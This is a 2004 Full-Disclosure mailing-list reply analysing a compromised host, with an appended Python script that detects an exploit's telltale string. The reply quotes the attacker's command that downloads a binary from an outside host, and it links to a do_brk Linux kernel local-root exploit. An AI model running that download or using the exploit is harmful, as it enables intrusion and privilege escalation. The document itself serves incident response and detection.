Re: [Full-Disclosure] Automated ssh scanning

From: Gary E. Miller (gem_at_rellim.com)
Date: 08/26/04

    To: Deigo Dude <deigodude@aol.com>
    Date: Thu, 26 Aug 2004 13:17:53 -0700 (PDT)
    
    

    Yo All!

    On Thu, 26 Aug 2004, Deigo Dude wrote:

    > Maybe running this test again, and this time ...

    No need to run the test again.

    From the .history I duplicated this:

     wget www.bo2k-rulez.net/a

    Then did this to see the strings in the binary:

     strings a | less

    This string looked interesting:

     Kernel seems not to be vulnerable

    A google on that string yields the exploit:

     http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php

    A simple exploit for the well known do_brk bug in the Linux kernel...

    RGDS
    GARY
    ---------------------------------------------------------------------------
    Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
            gem@rellim.com Tel:+1(541)382-8588 Fax: +1(541)382-8676

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
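The triage step Gary describes above (pull the binary the attacker fetched, run strings on it, look for a telltale message) as an added Python example; this is not code from the thread or from the exploit. It implements a minimal strings(1) equivalent and flags a file that contains an indicator string such as the one quoted in the mail. The sample bytes and the indicator label are constructed for the example.

```python
import re
from typing import Dict, List

# Indicator string -> label. The first entry is the string quoted in the thread,
# which the do_brk exploit prints when it fails; add your own IoCs here.
KNOWN_EXPLOIT_STRINGS: Dict[str, str] = {
    "Kernel seems not to be vulnerable": "do_brk local root exploit (hatorihanzo.c)",
}


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return runs of printable ASCII at least min_len long, like `strings -n N`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def match_indicators(data: bytes,
                     indicators: Dict[str, str] = KNOWN_EXPLOIT_STRINGS) -> Dict[str, str]:
    """Map each indicator found inside some extracted string to its label.

    Substring match, so a prefix such as "[-] " in the binary does not hide it.
    """
    runs = extract_strings(data)
    return {s: label for s, label in indicators.items() if any(s in run for run in runs)}


def scan_file(path: str) -> Dict[str, str]:
    """Read a suspect binary from disk and report matching indicators."""
    with open(path, "rb") as fh:
        return match_indicators(fh.read())


# Constructed stand-in for the downloaded binary `a`: ELF magic, control bytes,
# the failure message, and a two-byte run too short to count as a string.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01" + bytes(range(32))
    + b"[-] Kernel seems not to be vulnerable\n\x00"
    + b"ok\x00\x01\x02"
)

if __name__ == "__main__":
    for s, label in match_indicators(SAMPLE_BINARY).items():
        print(f"match: {s!r} -> {label}")
```

Run scan_file() over anything the shell history shows being fetched; a match only says the file carries a known exploit's message, so the host still needs the full compromise assessment.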

